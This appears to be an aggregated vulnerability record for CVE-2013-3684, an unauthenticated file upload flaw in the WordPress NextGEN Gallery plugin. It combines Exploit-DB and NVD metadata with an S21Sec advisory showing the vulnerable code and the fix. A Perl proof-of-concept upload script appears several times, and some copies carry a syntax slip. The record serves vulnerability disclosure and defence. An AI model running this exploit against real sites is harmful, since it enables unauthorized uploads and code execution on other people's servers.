source: http://www.securityfocus.com/bid/60533/info
The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected.
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;
my ($url, $file) = @ARGV;
my $ua = LWP::UserAgent->new();
my $req = POST $url,
Content_Type => 'form-data',
Content => [.
name => $name,
galleryselect => 1, # Gallery ID, should exist
Filedata => [ "$file", "file.gif", Content_Type =>
'image/gif' ]
];
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, "\n";
}
{"id": "EDB-ID:38585", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress NextGEN Gallery 'upload.php' Arbitrary File Upload Vulnerability", "description": "WordPress NextGEN Gallery 'upload.php' Arbitrary File Upload Vulnerability. CVE-2013-3684. Webapps exploit for php platform", "published": "2013-06-12T00:00:00", "modified": "2013-06-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/38585/", "reporter": "Marcos Garcia", "references": [], "cvelist": ["CVE-2013-3684"], "lastseen": "2016-02-04T08:24:57", "viewCount": 23, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-02-04T08:24:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3684"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:6453"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122021"]}], "modified": "2016-02-04T08:24:57", "rev": 2}, "vulnersScore": 6.7}, "sourceHref": "https://www.exploit-db.com/download/38585/", "sourceData": "source: http://www.securityfocus.com/bid/60533/info\r\n\r\nThe NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.\r\n\r\nAn attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.\r\n\r\nNextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected. \r\n\r\n#! /usr/bin/perl \r\nuse LWP; \r\nuse HTTP::Request::Common; \r\n\r\nmy ($url, $file) = @ARGV; \r\n\r\nmy $ua = LWP::UserAgent->new(); \r\nmy $req = POST $url, \r\nContent_Type => 'form-data', \r\nContent => [. \r\nname => $name, \r\ngalleryselect => 1, # Gallery ID, should exist \r\nFiledata => [ \"$file\", \"file.gif\", Content_Type => \r\n'image/gif' ] \r\n]; \r\nmy $res = $ua->request( $req ); \r\nif( $res->is_success ) { \r\nprint $res->content; \r\n} else { \r\nprint $res->status_line, \"\\n\"; \r\n} \r\n\r\n", "osvdbidlist": ["94232"]}
{"cve": [{"lastseen": "2020-12-09T19:52:43", "description": "NextGEN Gallery plugin before 1.9.13 for WordPress: ngggallery.php file upload", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-11T18:15:00", "title": "CVE-2013-3684", "type": "cve", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3684"], "modified": "2020-02-13T15:12:00", "cpe": [], "id": "CVE-2013-3684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3684", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2020-06-29T19:22:43", "bulletinFamily": "software", "cvelist": ["CVE-2013-3684"], "description": "WordPress Vulnerability - NextGEN Gallery 1.9.12 - Arbitrary File Upload\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6453", "href": "https://wpvulndb.com/vulnerabilities/6453", "type": "wpvulndb", "title": "NextGEN Gallery 1.9.12 - Arbitrary File Upload", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:26", "description": "", "published": "2013-06-13T00:00:00", "type": "packetstorm", "title": "NextGEN Gallery 1.9.12 Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3684"], "modified": "2013-06-13T00:00:00", "id": "PACKETSTORM:122021", "href": "https://packetstormsecurity.com/files/122021/NextGEN-Gallery-1.9.12-Shell-Upload.html", "sourceData": "`############################################################## \n \n \n- S21Sec Advisory - \n \n \n############################################################## \n \nTitle: NextGEN Gallery 1.9.12 Arbitrary File Upload \nID: S21SEC-046-en \nCVE ID: CVE-2013-3684 \nSeverity: High \nStatus: Fixed \nHistory: 27.May.2013 Vulnerability discovered \n28.May.2013 Vendor informed \n12.Jun.2013 Fix released \nAuthors: Marcos Ag\u00fcero (maguero@s21sec.com) \nURL: http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt \nRelease: Public \n \n \n[ SUMMARY ] \n \nNextGEN Gallery is a WordPress gallery plugin that offers sophisticated \ngallery management and \ndisplays. It's one of the most popular plugins ever produced for \nWordPress, currently downloaded \naround 30,000 times per week. \n \n[ AFFECTED VERSIONS ] \n \n* NextGEN Gallery 1.9.12 \n \n[ DESCRIPTION ] \n \nNextGEN Gallery allows file upload to unauthenticated users. Filters in \nplace only permits uploads \nof image files (extensions .gif, .png and .jpg). This avoids scripts \nexecution problems but an \nattacker could use the affected system to host files. \n \nVulnerability occurs due an innapropiate cookie validation in \nadmin/upload.php script: \n \nif (wp_validate_auth_cookie()) { \n$results = wp_parse_auth_cookie(); \n$logged_in = FALSE; \nif (isset($results['username']) && isset($results['expiration'])) { \nif (time() < floatval($results['expiration'])) { \nif (($userdata = \nget_userdatabylogin($results['username']))) \n$logged_in = $userdata->ID; \n} \n} \n \nif (!$logged_in) die(\"Login failure. -1\"); \nelse if (!user_can($logged_in, 'NextGEN Upload images')) { \ndie('You do not have permission to upload files. -2'); \n} \n} # VULN: No auth cookie is okay! \n \nThis can be triggered by invoking 'nggupload' parameter on any valid \nwordpress URL: \n \nngggallery.php: \n \n// Handle upload requests \nadd_action('init', array(&$this, 'handle_upload_request')); \n \n[...] \nfunction handle_upload_request() \n{ \nif (isset($_GET['nggupload'])) { \nrequire_once(implode(DIRECTORY_SEPARATOR, array( \nNGGALLERY_ABSPATH, \n'admin', \n'upload.php' \n))); \nthrow new E_Clean_Exit(); \n} \n} \n \n[ POC ] \n#! /usr/bin/perl \nuse LWP; \nuse HTTP::Request::Common; \n \nmy ($url, $file) = @ARGV; \n \nmy $ua = LWP::UserAgent->new(); \nmy $req = POST $url, \nContent_Type => 'form-data', \nContent => [ \nname => $name, \ngalleryselect => 1, # Gallery ID, should exist \nFiledata => [ \"$file\", \"file.gif\", Content_Type => \n'image/gif' ] \n]; \nmy $res = $ua->request( $req ); \nif( $res->is_success ) { \nprint $res->content; \n} else { \nprint $res->status_line, \"\\n\"; \n} \n \n[ SOLUTION ] \n \nVersion 1.9.13 released by vendor. \nhttp://wordpress.org/plugins/nextgen-gallery/ \n \n[ REFERENCES ] \n \n* S21Sec \nhttp://www.s21sec.com \n \n-- \nS21sec \n \n*Marcos Ag\u00fcero* \n/S21sec ACSS/ \n \nTlf: +34 902 222 521 \n \nwww.s21sec.com <http://www.s21sec.com>, blog.s21sec.com \n<http://blog.s21sec.com> securityblog.s21sec.com \n<http://securityblog.s21sec.com> \n \nSalvo que se indique lo contrario, esta informaci\u00f3n es CONFIDENCIAL y \ncontiene datos de car\u00e1cter personal que han de ser tratados conforme a \nla legislaci\u00f3n vigente en materia de protecci\u00f3n de datos. Si usted no es \ndestinatario original de este mensaje, le comunicamos que no est\u00e1 \nautorizado a revisar, reenviar, distribuir, copiar o imprimir la \ninformaci\u00f3n en \u00e9l contenida y le rogamos que proceda a borrarlo de sus \nsistemas. \n \nUnless contrary indicated, this information is CONFIDENTIAL and contains \npersonal data that shall be processed according to personal data \nprotection law in force. If you are not the named addressee of this \nmessage you are hereby notified that any review, dissemination, \ndistribution, copying or printing of this message is strictly prohibited \nand we urge you to delete it from your Systems. \n \nAntes de imprimir este mensaje valora si verdaderamente es necesario. De \nesta forma contribuimos a la preservaci\u00f3n del Medio Ambiente. \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/122021/S21SEC-046-en.txt"}]}
